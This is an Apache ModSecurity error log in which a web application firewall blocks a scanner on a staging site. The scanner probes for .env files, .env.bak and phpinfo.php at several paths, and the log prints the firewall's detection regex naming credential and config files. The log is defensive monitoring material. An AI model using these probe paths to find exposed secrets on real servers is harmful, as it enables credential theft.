[Tue May 26 15:30:53.373095 2026] [security2:error] [pid 715645:tid 715824] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPLQAAADE"]
[Tue May 26 15:30:53.394554 2026] [security2:error] [pid 715645:tid 715749] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public/.env"] [unique_id "ahVvVXVGgMGh8k213RgPMQAAf2c"]
[Tue May 26 15:30:53.410107 2026] [security2:error] [pid 715645:tid 715747] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/public/phpinfo.php"] [unique_id "ahVvVXVGgMGh8k213RgPMgAAEmU"]
[Tue May 26 15:30:53.444773 2026] [security2:error] [pid 715645:tid 715657] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/public_html/.env"] [unique_id "ahVvVXVGgMGh8k213RgPNAAAZAs"]
[Tue May 26 15:30:53.462221 2026] [security2:error] [pid 715645:tid 715743] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/qa/.env"] [unique_id "ahVvVXVGgMGh8k213RgPOAAAZGE"]
[Tue May 26 15:30:53.472640 2026] [security2:error] [pid 715645:tid 715772] [remote 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPMwAAZH4"]
[Tue May 26 15:30:53.513829 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPOgAAAFw"]
[Tue May 26 15:30:53.523258 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPQwAAAEk"]
[Tue May 26 15:30:53.524477 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPRQAAABo"]
[Tue May 26 15:30:53.534196 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPRwAAABQ"]
[Tue May 26 15:30:53.537433 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPRgAAAFU"]
[Tue May 26 15:30:53.559733 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPSwAAAFA"]
[Tue May 26 15:30:53.567634 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPTQAAAAk"]
[Tue May 26 15:30:53.578374 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPVgAAAGg"]
[Tue May 26 15:30:53.582023 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPWAAAACY"]
[Tue May 26 15:30:53.583634 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPVwAAACc"]
[Tue May 26 15:30:53.591752 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPWQAAAHo"]
[Tue May 26 15:30:53.597425 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPXAAAACs"]
[Tue May 26 15:30:53.612611 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPXwAAAAs"]
[Tue May 26 15:30:53.657092 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPZQAAAEc"]
[Tue May 26 15:30:53.662401 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPZwAAADo"]
[Tue May 26 15:30:53.673053 2026] [security2:error] [pid 715645:tid 715782] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPbQAAAAc"]
[Tue May 26 15:30:53.739561 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPfwAAAC0"]
[Tue May 26 15:30:53.746774 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPfgAAAGA"]
[Tue May 26 15:30:53.748322 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPgQAAACE"]
[Tue May 26 15:30:53.764983 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPggAAAF4"]
[Tue May 26 15:30:53.773041 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPhwAAAC4"]
[Tue May 26 15:30:53.773864 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPhgAAAH4"]
[Tue May 26 15:30:53.776308 2026] [security2:error] [pid 715645:tid 715873] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPigAAAGI"]
[Tue May 26 15:30:53.784672 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPkgAAAHE"]
[Tue May 26 15:30:53.800090 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPlAAAAFY"]
[Tue May 26 15:30:53.807117 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPlQAAABM"]
[Tue May 26 15:30:53.815830 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPnAAAAGM"]
[Tue May 26 15:30:53.822895 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPngAAAD0"]
[Tue May 26 15:30:53.826857 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPnQAAABg"]
[Tue May 26 15:30:53.867235 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPpQAAAGg"]
[Tue May 26 15:30:53.875250 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPpwAAAA8"]
[Tue May 26 15:30:53.878047 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPowAAAAM"]
[Tue May 26 15:30:53.893903 2026] [security2:error] [pid 715645:tid 715660] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/s3/.env.bak"] [unique_id "ahVvVXVGgMGh8k213RgPrQAAcA4"]
[Tue May 26 15:30:53.954552 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPswAAABU"]
[Tue May 26 15:30:53.956216 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPtAAAAD8"]
[Tue May 26 15:30:53.962562 2026] [security2:error] [pid 715645:tid 715710] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/.env"] [unique_id "ahVvVXVGgMGh8k213RgPyAAAGUA"]
[Tue May 26 15:30:53.973715 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPuQAAAEM"]
[Tue May 26 15:30:53.974925 2026] [security2:error] [pid 715645:tid 715717] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/api/.env"] [unique_id "ahVvVXVGgMGh8k213RgPyQAAGUc"]
[Tue May 26 15:30:53.977211 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPwAAAAGw"]
[Tue May 26 15:30:53.981126 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPvwAAAFM"]
[Tue May 26 15:30:54.015114 2026] [security2:error] [pid 715645:tid 715715] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/server/backend/.env"] [unique_id "ahVvVnVGgMGh8k213RgPywAAGUU"]
[Tue May 26 15:30:54.136975 2026] [security2:error] [pid 715645:tid 715852] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPdQAAAE0"]
[Tue May 26 15:30:54.162187 2026] [security2:error] [pid 715645:tid 715748] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/service/.env"] [unique_id "ahVvVnVGgMGh8k213RgP4QAAGWY"]
[Tue May 26 15:30:54.290178 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPwgAAADs"]
[Tue May 26 15:30:54.307489 2026] [security2:error] [pid 715645:tid 715782] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPxwAAAAc"]
[Tue May 26 15:30:54.322075 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPygAAGSg"]
[Tue May 26 15:30:54.323437 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgPzAAAGTA"]
[Tue May 26 15:30:54.331391 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgPzgAAGVc"]
[Tue May 26 15:30:54.332560 2026] [security2:error] [pid 715645:tid 715901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP3wAAAH4"]
[Tue May 26 15:30:54.335749 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPwwAAACg"]
[Tue May 26 15:30:54.335940 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP4AAAAE8"]
[Tue May 26 15:30:54.336127 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVXVGgMGh8k213RgPxgAAGTg"]
[Tue May 26 15:30:54.336886 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgPzwAAGSw"]
[Tue May 26 15:30:54.339113 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP2wAAADc"]
[Tue May 26 15:30:54.343062 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP0AAAGU4"]
[Tue May 26 15:30:54.346450 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgPzQAAGWM"]
[Tue May 26 15:30:54.353936 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP3AAAAC4"]
[Tue May 26 15:30:54.355040 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP0gAAGUk"]
